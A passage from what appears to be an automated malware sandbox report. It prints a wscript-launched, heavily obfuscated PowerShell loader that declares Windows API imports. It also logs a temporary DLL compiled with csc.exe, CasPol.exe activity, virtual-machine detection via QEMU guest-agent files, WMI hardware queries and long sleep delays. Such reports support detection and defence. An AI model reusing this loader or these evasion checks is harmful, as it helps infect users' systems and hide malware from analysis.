FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5CF89 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C677C7 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C625D3 push esp; iretd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6D5A0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C61CA3 push eax; retf
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C67B91 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C67A9E push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6E8B0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBCDA1 push es; retf 0007h
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBF579 push esp; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBE4D0 push ss; retf 0007h
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBE4F1 push ss; retf 0007h
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB7348 push esp; iretd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D3C9B0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D3BCF1 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D3CC82 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dllJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEG
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152Thread sleep count: 639 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152Thread sleep time: -319500s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
